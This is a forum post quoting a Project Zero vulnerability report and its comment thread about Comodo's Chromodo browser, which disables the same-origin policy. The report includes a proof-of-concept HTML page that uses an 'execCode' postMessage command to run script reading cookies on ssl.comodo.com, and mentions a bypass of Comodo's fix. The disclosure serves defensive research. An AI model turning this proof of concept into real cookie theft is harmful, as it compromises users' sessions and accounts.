From WidlbyDesign https://www.wilderssecurity.com/thre...ore-release-cicles.382607/page-3#post-2561395 Note that this was marked closed because Comodo said they fixed it but it wasn't really fixed so a new issue #713 was opened. I can't get to that issue though if someone else can post it here. There are also other open issues mentioned for C Dragon. Tavis Ormandy @taviso 3h3 hours ago Selling antivirus doesn't qualify you to fork chromium, you're going to screw it up. https://code.google.com/p/google-security-research/issues/detail?id=704 When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices. https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?.. To reproduce, do something like this: <html> <head></head> <body> <script> function steal_cookie(obj) { // Wait for the page to load setTimeout(function() { obj.postMessage(JSON.stringify({ command: "execCode", code: "alert(document.cookie)", }), "*"); }, 2000); } </script> <a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a> </body> </html> This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Windows 7 x86-2016-01-21-16-48-44.png 258 KB View Download Jan 25, 2016 Project Member #1 tav...@google.com I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply: FYI, I still haven't got a response. The same origin policy is basically disabled for all of your customers, which means there is no security on the web....this is about as bad as it gets. If the impact isn't clear to you, please let me know. This vulnerability is bad enough to start paging people. https://ssl.gstatic.com/codesite/ph/images/paperclip.gif exploit.html 1.3 KB View Download Jan 29 (4 days ago) Project Member #2 tav...@google.com Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix. I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week. Today (2 hours ago) Project Member #5 tav...@google.com It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit. This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue. The deleted comments above contained discussion about the bypass, I'll move them into a new issue. Project Member #6 tav...@google.com Discussion about the incorrect fix is in issue 713. Today (2 hours ago) Project Member #7 tav...@google.com (No comment was entered for this change.) Blocking: google-security-research:713 Today (2 hours ago) #8 kobrasre...@gmail.com "After "discussion" with Comodo (I can't really get any response from them, but I'm trying)" Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money. Today (62 minutes ago) #9 l33t...@gmail.com toppest of keks, my friend. There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin. Today (59 minutes ago)
